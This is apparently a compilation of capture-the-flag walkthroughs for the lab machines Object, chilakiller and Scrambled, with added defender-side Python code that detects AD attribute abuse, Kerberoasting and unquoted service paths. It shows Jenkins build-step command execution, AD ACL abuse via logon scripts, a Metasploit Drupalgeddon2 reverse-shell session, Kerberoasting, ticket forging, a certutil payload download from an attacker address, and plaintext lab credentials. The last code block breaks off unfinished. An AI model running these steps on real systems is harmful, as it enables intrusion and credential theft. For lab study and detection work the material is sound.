PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Jetty 9.4.43.v20210629
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
PORT 80 (HTTP)
On port 80 we can see the domain name object.htb, so let's add it to the /etc/hosts file and start fuzzing for files and directories with gobuster. The page also tells us to "login and submit code on the automation server", which is running on port 8080.
Gobuster didn't find anything, so next we can enumerate subdomains.
I kept wfuzz running; while it runs we can look at port 8080, where an instance of Jenkins is running.
PORT 8080 (HTTP)
I tried the default admin:admin credentials, but they didn't work, so we can just create an account.
We are logged in, and in the bottom right corner we can see the Jenkins version, which is 2.317.
wfuzz didn't find any subdomains either.
So we can create a Freestyle project by going to New Item.
After naming the project you'll be presented with Build Triggers, Build Environment, Source Code Management, etc. Select Build Triggers and then Build periodically; this lets you create a scheduled task configured like a cron job, which will start building your project. We can configure the job to run every minute with * * * * *
Next, under Build, there is an option Add build step, where we can select Execute Windows batch command.
Going back to the dashboard we can see a successful build.
This shows that we are executing commands as oliver.
So next I tried to see whether I could ping my machine from there.
We can, so now let's transfer nc64.exe to this machine.
But it wasn't able to make a connection to this port.
So I changed the port to 9001 and it still didn't make a connection.
It could be that a firewall is configured to block outbound traffic, so we can use the PowerShell cmdlet Get-NetFirewallRule to list the firewall rules; we need to check the outbound ones.
So we can't get a reverse shell, as the traffic won't go out. The next thing we can do is look at where Jenkins stores passwords and how it stores them, so that we can retrieve and decrypt them. I found a question on Stack Overflow about this.
It requires credentials.xml, master.key and hudson.util.Secret.
We still don't see a credentials.xml file. To transfer these files to our machine we need to base64-encode them and then read the output.
Now we can just decode them from base64 and get the original files.
But we still need the credentials.xml file, which couldn't be found on the box. Looking through the directories, there was a folder named users.
There's a config.xml, so let's just grab it and see if it's of any use to us.
It wasn't what we needed, so going into the admin's folder might give us something useful.
Foothold
Now we see another config file; there's no need to encode it, we can just read it as it is plain text.
This contains the hashed password, which we can crack using the tool we found on GitHub.
Like this we were able to recover the plain text password, c1cdfun_d2434. Since WinRM is open on the machine we can just use this password for the oliver user and get a shell on the machine.
Looking at C:\Users we see other users as well.
We can check for listening ports on the machine by running netstat -aof
Port 88 being open on this machine tells us that it's an Active Directory machine and, since Kerberos runs on a DC, that this is a domain controller.
So to enumerate the AD domain we need to transfer SharpHound.exe onto the machine somehow.
┌──(puck㉿kali)-[~/htb/object]
└─$ evil-winrm -i 10.10.11.132 -u oliver -p c1cdfun_d2434
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> $env:USERDNSDOMAIN
object.local
*Evil-WinRM* PS C:\Users\oliver\Documents> mkdir puck
Directory: C:\Users\oliver\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/23/2024 8:54 AM puck
*Evil-WinRM* PS C:\Users\oliver\Documents> cd puck
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> upload SharpHound.exe
Info: Uploading /home/puck/htb/object/SharpHound.exe to C:\Users\oliver\Documents\puck\SharpHound.exe
Data: 1395368 bytes of 1395368 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ./SharpHound.exe all
2024-03-23T08:55:50.0837796-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-03-23T08:55:50.2243965-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.2556464-07:00|INFORMATION|Initializing SharpHound at 8:55 AM on 3/23/2024
2024-03-23T08:55:50.4119095-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for object.local : jenkins.object.local
2024-03-23T08:55:50.4431626-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.5993967-07:00|INFORMATION|Beginning LDAP search for object.local
2024-03-23T08:55:50.6462777-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-03-23T08:55:50.6618979-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-03-23T08:56:21.3267021-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-03-23T08:56:36.5571557-07:00|INFORMATION|Consumers finished, closing output channel
2024-03-23T08:56:36.5884055-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Status: 92 objects finished (+92 2)/s -- Using 44 MB RAM
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Enumeration finished in 00:00:46.2025467
2024-03-23T08:56:36.8696534-07:00|INFORMATION|Saving cache with stats: 52 ID to type mappings.
52 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-03-23T08:56:36.8852775-07:00|INFORMATION|SharpHound Enumeration Completed at 8:56 AM on 3/23/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ls
Directory: C:\Users\oliver\Documents\puck
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/23/2024 8:56 AM 11437 20240323085636_BloodHound.zip
-a---- 3/23/2024 8:56 AM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 3/23/2024 8:55 AM 1046528 SharpHound.exe
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> download 20240323085636_BloodHound.zip
Info: Downloading C:\Users\oliver\Documents\puck\20240323085636_BloodHound.zip to 20240323085636_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck>
Start BloodHound by running neo4j first and then the BloodHound GUI, and upload the JSON files from the zip archive.
Running any of the pre-built queries we can see that the data is loaded and results are returned.
We can search for the oliver node and mark it as owned so we can look for paths to gain privileges.
Privilege Escalation (Smith)
Running the query Shortest Paths to Domain Admins, we can see a path from oliver to smith: oliver can change smith's password; smith has write rights on the maria user object; and maria is WriteOwner of the Domain Admins group.
I tried to change smith's password with net user, but it didn't work.
We can use the PowerView module to do that, as suggested in BloodHound's help for abusing ForceChangePassword.
And now to log in as smith.
Now to abuse GenericWrite, we can set an SPN on this user account to get a TGS ticket.
I followed the abuse described in BloodHound.
This added an SPN to the user account, but when I tried to Kerberoast it, it didn't work.
We can still abuse this by setting a logon script, which will execute when maria logs on to the machine.
Set-DomainObject -Identity maria -SET @{scriptpath="C:\ProgramData\logonscript.ps1"}
This will execute a PowerShell script that lists the contents of maria's Desktop folder. I did also try to change maria's password with net user maria Password123!, but that didn't work.
dir C:\Users\maria\Desktop > C:\ProgramData\dir_result.txt
We can see that a text file has been created, which shows that there's an Excel file in maria's Desktop folder.
Now just replace the current command in the ps1 script with this.
We can see that we are a member of the Domain Admins group, so we can read the root and user flags, but you need to log in again because the change only takes effect after a new logon.
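As a defender's counterpart to the SPN and scriptPath writes above, here is an added example (not part of the original writeup) that flags such attribute changes in Security Event 5136 records. The records are constructed for the example and use the data names of the real 5136 event; the allowlisted principals and the domain are assumptions.

```python
"""Flag GenericWrite-style attribute abuse (logon script, SPN) in Security Event 5136.

Added example, not part of the original writeup. The sample records below are
constructed; they carry the data names of the real 5136 event ("A directory
service object was modified"), but every value is made up.
"""
from dataclasses import dataclass

# Attribute writes on user objects that mirror the abuse path shown above.
WATCHED_ATTRIBUTES = {
    "scriptPath": "logon script set: runs in the target's context at next logon",
    "servicePrincipalName": "SPN added: account becomes Kerberoastable",
}

# Principals expected to write these attributes in this (assumed) environment,
# e.g. a provisioning service account. Everyone else raises an alert.
ALLOWLIST = {"svc_adprov", "Administrator"}

# Once rendered, 5136 reports OperationType as "Value Added" or "Value Deleted";
# only additions matter for these two attributes.
VALUE_ADDED = "Value Added"


@dataclass(frozen=True)
class Alert:
    actor: str
    target_dn: str
    attribute: str
    value: str
    reason: str


def _short_name(principal: str) -> str:
    """Strip a DOMAIN\\ prefix so allowlist entries can be plain sAMAccountNames."""
    return principal.rsplit("\\", 1)[-1]


def detect_attribute_abuse(events):
    """Return one Alert per watched-attribute addition on a user object made by
    a principal outside ALLOWLIST. Records that are not 5136, not user objects,
    deletions, or writes to untracked attributes are ignored."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("ObjectClass") != "user":
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        attr = ev.get("AttributeLDAPDisplayName", "")
        if attr not in WATCHED_ATTRIBUTES:
            continue
        actor = _short_name(ev.get("SubjectUserName", ""))
        if actor in ALLOWLIST:
            continue
        alerts.append(Alert(actor, ev["ObjectDN"], attr,
                            ev.get("AttributeValue", ""), WATCHED_ATTRIBUTES[attr]))
    return alerts


# Constructed sample: the smith -> maria path from the writeup, plus benign noise.
_MARIA = "CN=maria,CN=Users,DC=object,DC=local"
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "OBJECT\\smith", "ObjectDN": _MARIA, "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "HTTP/example.object.local",
     "OperationType": "Value Added"},
    {"EventID": 5136, "SubjectUserName": "OBJECT\\smith", "ObjectDN": _MARIA, "ObjectClass": "user",
     "AttributeLDAPDisplayName": "scriptPath", "AttributeValue": "C:\\ProgramData\\logonscript.ps1",
     "OperationType": "Value Added"},
    # provisioning account assigning a standard logon script: allowlisted
    {"EventID": 5136, "SubjectUserName": "OBJECT\\svc_adprov",
     "ObjectDN": "CN=newhire,CN=Users,DC=object,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "scriptPath", "AttributeValue": "\\\\dc\\netlogon\\std.bat",
     "OperationType": "Value Added"},
    # untracked attribute
    {"EventID": 5136, "SubjectUserName": "OBJECT\\smith", "ObjectDN": _MARIA, "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "HR", "OperationType": "Value Added"},
    # removal of the script, not an addition
    {"EventID": 5136, "SubjectUserName": "OBJECT\\smith", "ObjectDN": _MARIA, "ObjectClass": "user",
     "AttributeLDAPDisplayName": "scriptPath", "AttributeValue": "C:\\ProgramData\\logonscript.ps1",
     "OperationType": "Value Deleted"},
    # different event ID entirely
    {"EventID": 4738, "SubjectUserName": "OBJECT\\smith", "ObjectDN": _MARIA},
]

if __name__ == "__main__":
    for a in detect_attribute_abuse(SAMPLE_EVENTS):
        print(f"[ALERT] {a.actor} wrote {a.attribute}={a.value!r} on {a.target_dn}: {a.reason}")
```

Event 5136 is only generated when the Directory Service Changes audit subcategory is enabled and the object's SACL audits Write Property, so confirm both before relying on this signal.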
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat ports.nmap
# Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182
Nmap scan report for 10.150.150.182
Host is up (0.086s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA)
| 256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA)
|_ 256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519)
80/tcp open http nginx 1.4.0 (Ubuntu)
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
| working. Further configuration is required.</p>
| <p>For online documentation and support please refer to
| href="http://nginx.org/">nginx.org</a>.<br/>
| Commercial support is available at
| href="http://nginx.com/">nginx.com</a>.</p>
| <p><em>Thank you for using nginx.</em></p>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST
| Content-Length: 0
| Connection: close
| Content-Type: text/html
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Content-Length: 299
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>400 Bad Request</title>
| </head><body>
| <h1>Bad Request</h1>
| <p>Your browser sent a request that this server could not understand.<br />
| </p>
| <hr>
| <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address>
|_ </body></html>
|_http-title: Welcome to nginx!
|_http-server-header: nginx 1.4.0 (Ubuntu)
8080/tcp open http-proxy nginx 1.4.0 (Ubuntu)
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
|_ --snip--
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run
[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check (“set AutoCheck false” to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200
ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >
www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
 * 'password' => 'password',
 * username, password, host, and database name.
 * 'password' => 'password',
 * 'password' => 'password',
 * 'password' => 'password',
 * 'password' => 'password',
 'password' => 'EstaContraNoesTanImp0rtant3!!!',
 * by using the username and password variables. The proxy_user_agent variable
 # $conf['proxy_password'] = '';
www-data@chilakiller:/var/www/html/restaurante/sites/default$
www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
su user1
Password: user1
user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
cd /home/user1
user1@chilakiller:~$ ls
ls
Desktop Documents FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-15 23:15:44Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
4411/tcp open found? syn-ack ttl 127
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49552/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
There are many open ports; this looks like an Active Directory target, with LDAP and Kerberos enabled. We need to enumerate several interesting places.
We found several domain names that might be useful later.
04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues
http://scrm.local/salesorders.html: this page shows a client application used by this organisation. Later we will find the matching server running on port 4411.
If you are experiencing a problem with the sales orders app, please enable debug logging and reproduce the problem. You can enable debug logging by doing the following:
A log file named ScrambleDebugLog will have been created in the same folder you launched the sales app from. Send this file to us via email along with a description of the problem
So this target may not have much to do with web vectors.
Host Enum
Perform host enum; it didn't find anything useful.
> enum4linux 10.10.11.168
Port 4411 Enum
Use nc to connect to the non-standard port 4411. There seems to be a server application running here, but we cannot confirm which application it is.
> nc -vn 10.10.11.168 4411
LDAP Enum
Perform LDAP enum using a simple Python module.
Python 3.10.4 (main, Mar 24 2022, 13:07:27) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ldap3
>>> server = ldap3.Server('10.10.11.168', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3, 2
Naming contexts:
DC=scrm,DC=local
CN=Configuration,DC=scrm,DC=local
CN=Schema,CN=Configuration,DC=scrm,DC=local
DC=DomainDnsZones,DC=scrm,DC=local
DC=ForestDnsZones,DC=scrm,DC=local
An nmap scan using the ldap scripts confirms the above results.
> nmap -n -sV --script "ldap* and not brute" 10.10.11.168
And we know from the previous screenshot that there might be a user called ksimpson. We can confirm this. This user also happens to use a password that is the same as the username.
Save the ticket to a file mssqlsvc-hash and crack it using john.
┌──(puck㉿kali)-[~/htb/scrambled]
└─$
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt mssqlsvc-hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pegasus60 (?)
1g 0:00:00:03 DONE (2023-10-13 16:12) 0.2652g/s 2846Kp/s 2846Kc/s 2846KC/s Petergrant..Pearce
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(puck㉿kali)-[~/htb/scrambled]
We now have a service principal credential, sqlsvc:Pegasus60
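The hash john loaded is etype 23 (RC4-HMAC), which is the marker a defender watches for in Event 4769 on the DC. Added example, not from the original writeup: it scans constructed 4769 records for RC4 service-ticket requests against accounts that hold user-assigned SPNs and clusters them by requesting client. Field names follow the real event; the users, hosts and addresses are invented.

```python
"""Spot Kerberoast-style TGS requests in Security Event 4769 records.

Added example, not part of the original writeup. Sample records are constructed
and use the 4769 data names (TargetUserName, ServiceName, TicketEncryptionType,
IpAddress, Status); users, hosts and addresses are invented.
"""
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the "krb5tgs ... RC4" hash format john cracked above


def is_user_spn_service(service_name: str) -> bool:
    """Computer accounts end in '$' and a ServiceName of krbtgt is a TGT, not a
    service ticket; only SPNs held by ordinary user accounts are roastable."""
    name = service_name.split("@", 1)[0]
    return not name.endswith("$") and name.lower() != "krbtgt"


def rc4_tgs_to_user_spns(events):
    """Return the 4769 records that granted an RC4 service ticket for a
    user-account SPN. Failed requests (Status != 0x0) are skipped because no
    ticket, and therefore no crackable blob, was issued."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4769:
            continue
        if ev.get("Status", "0x0") != "0x0":
            continue
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        if not is_user_spn_service(ev["ServiceName"]):
            continue
        hits.append(ev)
    return hits


def cluster_by_requester(hits, min_services=2):
    """Group hits by (client IP, requesting user) and keep requesters that
    pulled RC4 tickets for at least min_services distinct service accounts,
    the signature of a bulk roast rather than a single legacy client."""
    seen = defaultdict(set)
    for ev in hits:
        seen[(ev["IpAddress"], ev["TargetUserName"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_services}


SAMPLE_EVENTS = [
    # one client pulls RC4 tickets for two user SPNs: roast pattern
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.2", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.2", "Status": "0x0"},
    # same service, AES ticket for a normal workstation user: benign
    {"EventID": 4769, "TargetUserName": "jdoe@SCRM.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.11.50", "Status": "0x0"},
    # RC4 ticket for a computer account: not a user SPN
    {"EventID": 4769, "TargetUserName": "jdoe@SCRM.LOCAL", "ServiceName": "DC1$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.11.50", "Status": "0x0"},
    # TGT renewal shows up with ServiceName krbtgt: ignore
    {"EventID": 4769, "TargetUserName": "jdoe@SCRM.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.11.50", "Status": "0x0"},
    # unknown SPN, request denied: no ticket was issued
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.2", "Status": "0x7"},
]

if __name__ == "__main__":
    hits = rc4_tgs_to_user_spns(SAMPLE_EVENTS)
    for (ip, user), services in cluster_by_requester(hits).items():
        print(f"[ALERT] {user} from {ip} requested RC4 tickets for {services}")
```

An account that supports AES can still be issued an RC4 ticket if the client asks for it, so the encryption type is a property of the request; restricting msDS-SupportedEncryptionTypes on service accounts to AES removes that path.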
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@SCRM.LOCAL
Valid starting Expires Service principal
10/13/2023 16:28:55 10/10/2033 16:28:55 MSSQLSVC/dc1.scrm.local@SCRM.LOCAL
renew until 10/10/2033 16:28:55
┌──(puck㉿kali)-[~/htb/scrambled]
└─$
impacket-mssqlclient dc1.scrm.local -k
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
select name, database_id from sys.databases;
name database_id
---------- -----------
master 1
tempdb 2
model 3
msdb 4
ScrambleHR 5
SQL (SCRM\administrator dbo@master)>
SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
Upload SharpHound.exe (I used this version: /usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe), run SharpHound, and transfer the result back to Kali for analysis.
From the BloodHound analysis we find a tstar user in the IT group which has the CanPSRemote right. However, this proved useless after some trial and error.
PE
Upload winpeas
> certutil.exe -urlcache -f http://10.10.16.3/p.exe p.exe
# found something interesting in the winPEAS output
ScrmOrders(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Auto - Running - No quotes and Space detected
[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
HR (Path: C:\Shares\HR) -- Permissions: AllAccess
IPC$ (Path: )
IT (Path: C:\Shares\IT) -- Permissions: AllAccess
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\scrm.local\SCRIPTS)
Public (Path: C:\Shares\Public) -- Permissions: AllAccess
Sales (Path: C:\Shares\Sales) -- Permissions: AllAccess
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)
There is a PDF document in C:\Shares\Public which says HR has a database that may contain user passwords.
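winPEAS flagged the ScrmOrders service because its ImagePath is unquoted and contains a space. Added example (not the writeup's own code): an audit function that, given a service ImagePath, lists the executables Windows would look for before the intended binary and produces the quoted, remediated value. The ScrambleServer.exe path is the one from the winPEAS line above; the other sample paths are constructed.

```python
"""Audit Windows service ImagePath values for the unquoted-path weakness winPEAS reported.

Added example, not part of the original writeup. The ScrambleServer.exe path is
the one winPEAS printed above; the other sample paths are constructed.
"""
from dataclasses import dataclass, field


@dataclass
class ImagePathFinding:
    image_path: str
    binary: str                 # executable Windows is meant to start
    args: str                   # trailing arguments, if any
    lookups_before_binary: list = field(default_factory=list)
    remediated: str = ""

    @property
    def unquoted_with_spaces(self) -> bool:
        return bool(self.lookups_before_binary)


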